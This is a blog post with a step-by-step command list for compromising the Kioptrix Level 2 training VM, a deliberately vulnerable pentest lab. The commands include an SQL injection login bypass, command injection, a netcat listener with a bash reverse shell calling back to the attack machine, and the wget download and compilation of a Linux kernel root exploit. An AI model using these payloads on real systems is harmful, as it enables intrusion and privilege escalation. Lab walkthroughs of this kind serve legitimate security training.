rss
twitter
  •  

[VIDEO] Rooting A Box (Local Command Execution)

| Posted in Security Videos |

4

  • Sumo

It's been a while I last updated this blog (been working on some projects lately), but I had to steal time out to make this.

In this session, we will be having a look at gaining root priviledges using command execution

 

Overview

Our target system is Kioptrix 2.

Kioptrix is a “Vulnerable-By-Design OS” which serves as a Pentest lab for security enthusiasts to legally try out their skills with the aim to completely compromise the machine.

The video describes a step-by-step way of going about this.

What Resources Do We Need?

   * Kioptrix – Level 2 VM. Download here
   * A Virtual Machine (Example: VMware Player or Virtual Box)

   * Nmap – (Can be found on BackTrack 5-R2). Download here
   * Firefox –  (Can be found on BackTrack 5-R2)
   * Linux Kernel 2.6 Root Exploit – (Can be found on exploit-db.com)  

Steps

   * Discover network for hosts (Netdiscover)     
   * Scan target network (Nmap)
   * Bypass login screen (MySQL Injection)   
   * Set NetCat to listen on attack machine    
   * Inject bash reverse shell.
   * Navigate to directory where apache user can write files (cd /tmp)   
   * Search for Local privilege escalation exploit for linux kernel version 2.6
   * Download exploit code and host it on attack machine
   * Use reverse shell to wget exploit code to Victim’s machine
   * Compile exploit code and Execute.
   * Game Over

 

 

  Commands

netdiscover –r 192.168.61.0/24
nmap 192.168.61.130 –p 1-65500 –o –sS –sV –v
clear
firefox 192.168.61.130
-> User: admin 
-> Password: 1’ or ‘1--

; cat index.php
nc –lvvp 4000
// We want to get a basic shell on the server, so we’ve setup our netcat listener to listen on port 4000 for the shell
/bin/sh 0</dev/tcp/192.168.61.128/4000 1>&0 2>&0

//Using bash, we have successfully created our connect back shell code with a single line of command
uname –a
whoami
// we are still apache user and the objective says we should be “root”
Cat /etc/issue
Firefox www.exploit-db.com
Search for “linux kernel 2.6”
Download ip_append_data() local ring0 root exploit
wget 192.168.61.128/9542.c
//Download the exploit code “9542.c” to the victim’s machine
gcc 9542.c –o RootMeNow
//Compile the exploit code
./RootMeNow
cat /etc/passwd
cat /etc/passwd && whoami && uname –a
cd /var/www
cd html
ls
whoami

 #####                          #######
#     #   ##   #    # ######    #     # #    # ###### #####
#        #  #  ##  ## #         #     # #    # #      #    #
#  #### #    # # ## # #####     #     # #    # #####  #    #
#     # ###### #    # #         #     # #    # #      #####
#     # #    # #    # #         #     #  #  #  #      #   #
 #####  #    # #    # ######    #######   ##   ###### #    #

Songs

– 07 Drive It Like You Stole It (Mindelixir Remix)

– 10 A Dream Within A Dream (Skeet Skeet Remix)

 

Kindly use the comment box below for feedbacks

 

– InfosecShinobi

Comments (4)

nice … 

Niceeeeeee 🙂

It would have been better if you added your voice instead of the music. The explanation is better done by your own voice.
Also,theway the video is embedded can be better. Viewing at even HD, I can't see some things you are typing. The option for full screen viewing  isn't there..
Top marks for the effort anyway!..

Thanks for dropping by.

You can view the Full screen on Youtube. Just click on the "Watch On Yotube" link located at the bottom right.

Click on Change quality, select 720p HD and then finally click on Full Screen.

Also, the commands used are on this page so you can just browse through the commands and copy if you need to.

Cheers.

Post a comment